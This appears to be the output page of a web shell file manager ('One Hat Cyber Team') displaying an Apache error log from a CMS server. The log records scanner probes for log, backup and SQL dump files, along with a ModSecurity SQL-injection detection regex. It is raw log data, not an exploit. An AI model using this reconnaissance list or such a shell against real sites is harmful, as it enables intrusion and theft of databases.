⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.101
Server IP:
178.33.27.10
Server:
Linux cpanel.dev-unit.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
Server Software:
Apache/2.4.62 (Unix) OpenSSL/1.0.2k-fips
PHP Version:
8.2.25
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
proc
/
self
/
root
/
usr
/
local
/
apache
/
domlogs
/
View File Name :
cms-1.dev-unit.com.error.log
[Tue Jun 10 06:04:42.667598 2025] [authz_core:error] [pid 18401:tid 140121764493056] [client 165.227.173.41:39042] AH01630: client denied by server configuration: /home/id/cms-1.dev-unit.com/server-status [Tue Jun 10 06:04:43.525741 2025] [authz_core:error] [pid 18343:tid 140121688958720] [client 207.154.197.113:46620] AH01630: client denied by server configuration: /home/id/cms-1.dev-unit.com/server-status [Tue Jun 10 06:04:43.557825 2025] [:error] [pid 18343:tid 140121680566016] [client 165.227.173.41:39134] File does not exist: /home/id/cms-1.dev-unit.com/info.php [Tue Jun 10 06:04:44.085239 2025] [:error] [pid 18342:tid 140121798063872] [client 207.154.197.113:46702] File does not exist: /home/id/cms-1.dev-unit.com/info.php [Tue Jun 10 06:12:59.052895 2025] [autoindex:error] [pid 18343:tid 140121823241984] [client 185.24.11.176:38396] AH01276: Cannot serve directory /home/id/cms-1.dev-unit.com/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Jun 10 08:06:41.394765 2025] [autoindex:error] [pid 18342:tid 140121688958720] [client 196.132.65.152:48470] AH01276: Cannot serve directory /home/id/cms-1.dev-unit.com/assets/front/fonts/sofia/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://cms-1.dev-unit.com/assets/front/css/ecommerce-style.css [Tue Jun 10 08:36:44.157491 2025] [autoindex:error] [pid 18343:tid 140121789671168] [client 196.132.65.152:30818] AH01276: Cannot serve directory /home/id/cms-1.dev-unit.com/assets/front/fonts/sofia/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://cms-1.dev-unit.com/assets/front/css/ecommerce-style.css [Tue Jun 10 08:36:47.114230 2025] [autoindex:error] [pid 18343:tid 140121722529536] [client 196.132.65.152:30767] AH01276: Cannot serve directory /home/id/cms-1.dev-unit.com/assets/front/fonts/sofia/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://cms-1.dev-unit.com/assets/front/css/ecommerce-style.css [Tue Jun 10 08:36:58.426452 2025] [autoindex:error] [pid 18343:tid 140121781278464] [client 196.132.65.152:30836] AH01276: Cannot serve directory /home/id/cms-1.dev-unit.com/assets/front/fonts/sofia/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://cms-1.dev-unit.com/assets/front/css/ecommerce-style.css [Tue Jun 10 08:37:11.383843 2025] [autoindex:error] [pid 18343:tid 140121806456576] [client 196.132.65.152:30777] AH01276: Cannot serve directory /home/id/cms-1.dev-unit.com/assets/front/fonts/sofia/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://cms-1.dev-unit.com/assets/front/css/ecommerce-style.css [Sun Jun 15 03:33:25.856863 2025] [core:error] [pid 32623:tid 140503764899584] [client 46.101.106.207:36254] Script timed out before returning headers: index.php [Sun Jun 15 03:33:27.549004 2025] [core:error] [pid 32623:tid 140503756506880] [client 46.101.106.207:56594] Script timed out before returning headers: index.php [Tue Jun 17 21:22:27.081279 2025] [:error] [pid 14969:tid 140672812128000] [client 196.221.7.26:64384] [client 196.221.7.26] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\sexec\\\\s+xp_cmdshell)|(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?!\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\w])|(?:from\\\\W+information_schema\\\\W)|(?:(?:(?:current_)?user|database|schema|connection_id)\\\\s*?\\\\([^\\\\)]*?)|(?:[\\"'`\\xc2\\xb4\\xe2 ..." at ARGS:styles. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "207"] [id "981255"] [msg "Detects MSSQL code execution and information gathering attempts"] [data "Matched Data: \\x22selecto found within ARGS:styles: [{\\x22selectors\\x22:[\\x22#statisticsSection\\x22],\\x22style\\x22:{\\x22background-image\\x22:\\x22url(https://cms-1.dev-unit.com/assets/front/img/618d04b8a8775.jpg)\\x22,\\x22background-size\\x22:\\x22cover\\x22,\\x22padding\\x22:\\x22100px 0px\\x22}}]"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "cms-1.dev-unit.com"] [uri "/admin/pagebuilder/save"] [unique_id "aFGyY9JYX7Ej7UJM_tCuAQAAANM"], referer: https://cms-1.dev-unit.com/admin/pagebuilder/content?type=themeHome&theme=lawyer&language=en [Sun Jun 29 23:20:19.419478 2025] [:error] [pid 29227:tid 140563575682816] [client 185.177.72.179:61548] [client 185.177.72.179] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/storage/logs/laravel.log"] [unique_id "aGGgAwPeD2HuyYHWGKZwfwAAAFE"] [Sun Jun 29 23:20:19.427689 2025] [:error] [pid 29227:tid 140563542112000] [client 185.177.72.179:61548] [client 185.177.72.179] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/storage/logs/error.log"] [unique_id "aGGgAwPeD2HuyYHWGKZwgAAAAFU"] [Sun Jun 29 23:20:19.438382 2025] [:error] [pid 29227:tid 140563516933888] [client 185.177.72.179:61548] [client 185.177.72.179] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/logs/debug.log"] [unique_id "aGGgAwPeD2HuyYHWGKZwgQAAAFg"] [Sun Jun 29 23:20:19.446698 2025] [:error] [pid 29227:tid 140563676395264] [client 185.177.72.179:61548] [client 185.177.72.179] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/logs/app.log"] [unique_id "aGGgAwPeD2HuyYHWGKZwggAAAEU"] [Sun Jun 29 23:20:19.454951 2025] [:error] [pid 29227:tid 140563617646336] [client 185.177.72.179:61548] [client 185.177.72.179] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/debug.log"] [unique_id "aGGgAwPeD2HuyYHWGKZwgwAAAEw"] [Sun Jun 29 23:20:19.463150 2025] [:error] [pid 29227:tid 140563533719296] [client 185.177.72.179:61548] [client 185.177.72.179] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/error.log"] [unique_id "aGGgAwPeD2HuyYHWGKZwhAAAAFY"] [Sun Jun 29 23:20:20.022985 2025] [:error] [pid 29227:tid 140563759286016] [client 185.177.72.179:61548] [client 185.177.72.179] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/.backup"] [unique_id "aGGgBAPeD2HuyYHWGKZwhwAAAEQ"] [Sun Jun 29 23:20:20.029073 2025] [:error] [pid 29227:tid 140563558897408] [client 185.177.72.179:61548] [client 185.177.72.179] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/db.sql"] [unique_id "aGGgBAPeD2HuyYHWGKZwiAAAAFM"] [Sun Jun 29 23:20:20.080957 2025] [:error] [pid 29227:tid 140563767678720] [client 185.177.72.179:61548] [client 185.177.72.179] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/dump.sql"] [unique_id "aGGgBAPeD2HuyYHWGKZwiQAAAEM"] [Sun Jun 29 23:20:20.198674 2025] [:error] [pid 29227:tid 140563567290112] [client 185.177.72.179:61548] [client 185.177.72.179] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/database.sql"] [unique_id "aGGgBAPeD2HuyYHWGKZwigAAAFI"] [Mon Jun 30 00:15:47.110783 2025] [:error] [pid 29331:tid 140563567290112] [client 185.177.72.10:54858] [client 185.177.72.10] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/storage/logs/laravel.log"] [unique_id "aGGtA3YyGnwcPpPuQvPfOgAAANI"] [Mon Jun 30 00:15:47.119197 2025] [:error] [pid 29331:tid 140563609253632] [client 185.177.72.10:54858] [client 185.177.72.10] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/storage/logs/error.log"] [unique_id "aGGtA3YyGnwcPpPuQvPfOwAAAM0"] [Mon Jun 30 00:15:47.126603 2025] [:error] [pid 29331:tid 140563659609856] [client 185.177.72.10:54858] [client 185.177.72.10] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/logs/debug.log"] [unique_id "aGGtA3YyGnwcPpPuQvPfPAAAAMc"] [Mon Jun 30 00:15:47.133974 2025] [:error] [pid 29331:tid 140563542112000] [client 185.177.72.10:54858] [client 185.177.72.10] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/logs/app.log"] [unique_id "aGGtA3YyGnwcPpPuQvPfPQAAANU"] [Mon Jun 30 00:15:47.140243 2025] [:error] [pid 29331:tid 140563767678720] [client 185.177.72.10:54858] [client 185.177.72.10] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/debug.log"] [unique_id "aGGtA3YyGnwcPpPuQvPfPgAAAMM"] [Mon Jun 30 00:15:47.146457 2025] [:error] [pid 29331:tid 140563676395264] [client 185.177.72.10:54858] [client 185.177.72.10] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/error.log"] [unique_id "aGGtA3YyGnwcPpPuQvPfPwAAAMU"] [Mon Jun 30 00:15:47.648491 2025] [:error] [pid 29331:tid 140563776071424] [client 185.177.72.10:54858] [client 185.177.72.10] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/.backup"] [unique_id "aGGtA3YyGnwcPpPuQvPfQwAAAMI"] [Mon Jun 30 00:15:47.656799 2025] [:error] [pid 29331:tid 140563558897408] [client 185.177.72.10:54858] [client 185.177.72.10] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] 